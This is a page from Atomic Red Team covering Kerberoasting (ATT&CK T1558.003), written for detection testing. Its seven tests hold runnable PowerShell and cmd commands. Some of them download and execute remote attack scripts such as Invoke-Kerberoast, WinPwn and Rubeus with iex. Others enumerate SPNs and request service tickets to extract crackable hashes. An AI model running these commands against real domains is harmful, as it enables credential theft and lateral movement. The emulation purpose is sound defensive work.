Skip to content
Atomic Red Team
atomics
T1558.003

T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting

Description from ATT&CK (opens in a new tab)

Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to Brute Force (opens in a new tab).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015)

Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)

Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force (opens in a new tab) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)

This same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)

Cracked hashes may enable Persistence (opens in a new tab), Privilege Escalation (opens in a new tab), and Lateral Movement (opens in a new tab) via access to Valid Accounts (opens in a new tab).(Citation: SANS Attacking Kerberos Nov 2014)

Atomic Tests


Atomic Test #1 - Request for service tickets

This test uses the Powershell Empire Module: Invoke-Kerberoast.ps1 The following are further sources and credits for this attack: [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/ (opens in a new tab)) [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/ (opens in a new tab)) when executed successfully , the test displays available services with their hashes. If the testing domain doesn't have any service principal name configured, there is no output

Supported Platforms: Windows

auto_generated_guid: 3f987809-3681-43c8-bcd8-b3ff3a28533a

Attack Commands: Run with powershell!

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
Invoke-Kerberoast | fl

Dependencies: Run with powershell!

Description: Computer must be domain joined
Check Prereq Commands:
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
Get Prereq Commands:
Write-Host Joining this computer to a domain must be done manually


Atomic Test #2 - Rubeus kerberoast

Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast (opens in a new tab) This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus

Supported Platforms: Windows

auto_generated_guid: 14625569-6def-4497-99ac-8e7817105b55

Inputs:

NameDescriptionTypeDefault Value
local_folderLocal path of Rubeus executablepathPathToAtomicsFolder\..\ExternalPayloads
local_executablename of the rubeus executablestringrubeus.exe
out_filefile where command results are storedstringrubeus_output.txt
rubeus_urlURL of Rubeus executableurlhttps://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe (opens in a new tab)
flagscommand flags you would like to run (optional and blank by default)string

Attack Commands: Run with powershell!

klist purge
cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"

Cleanup Commands:

Remove-Item "#{local_folder}\#{out_file}" -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Computer must be domain joined
Check Prereq Commands:
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
Get Prereq Commands:
Write-Host Joining this computer to a domain must be done manually
Description: Rubeus must exist
Check Prereq Commands:
if(Test-Path -Path "#{local_folder}\#{local_executable}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-Webrequest -Uri #{rubeus_url} -OutFile "#{local_folder}\#{local_executable}"


Atomic Test #3 - Extract all accounts in use as SPN using setspn

The following test will utilize setspn to extract the Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output all the SPNs for the related domain.

Supported Platforms: Windows

auto_generated_guid: e6f4affd-d826-4871-9a62-6c9004b8fe06

Inputs:

NameDescriptionTypeDefault Value
domain_nameThe Domain Name to lookup againststring%USERDNSDOMAIN%

Attack Commands: Run with command_prompt!

setspn -T #{domain_name} -Q */*

Dependencies: Run with powershell!

Description: Computer must be domain joined
Check Prereq Commands:
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
Get Prereq Commands:
Write-Host Joining this computer to a domain must be done manually


Atomic Test #4 - Request A Single Ticket via PowerShell

The following test will utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output the SPNs for the endpoint in question.

Supported Platforms: Windows

auto_generated_guid: 988539bc-2ed7-4e62-aec6-7c5cf6680863

Attack Commands: Run with powershell!

Add-Type -AssemblyName System.IdentityModel
$ComputerFQDN=$env:LogonServer.trimStart('\') + "." + $env:UserDnsDomain
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/$ComputerFQDN"

Dependencies: Run with powershell!

Description: Computer must be domain joined
Check Prereq Commands:
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
Get Prereq Commands:
Write-Host Joining this computer to a domain must be done manually


Atomic Test #5 - Request All Tickets via PowerShell

The following test will utilize native PowerShell Identity modules to query the domain to extract allthe Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output the SPNs for the domain in question.

Supported Platforms: Windows

auto_generated_guid: 902f4ed2-1aba-4133-90f2-cff6d299d6da

Inputs:

NameDescriptionTypeDefault Value
domain_nameThe Domain Name to lookup againststring%USERDNSDOMAIN%

Attack Commands: Run with powershell!

Add-Type -AssemblyName System.IdentityModel  
setspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Dependencies: Run with powershell!

Description: Computer must be domain joined
Check Prereq Commands:
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
Get Prereq Commands:
Write-Host Joining this computer to a domain must be done manually


Atomic Test #6 - WinPwn - Kerberoasting

Kerberoasting technique via function of WinPwn

Supported Platforms: Windows

auto_generated_guid: 78d10e20-c874-45f2-a9df-6fea0120ec27

Attack Commands: Run with powershell!

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Kerberoasting -consoleoutput -noninteractive


Atomic Test #7 - WinPwn - PowerSharpPack - Kerberoasting Using Rubeus

PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn

Supported Platforms: Windows

auto_generated_guid: 29094950-2c96-4cbd-b5e4-f7c65079678f

Attack Commands: Run with powershell!

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
Invoke-Rubeus -Command "kerberoast /format:hashcat /nowrap"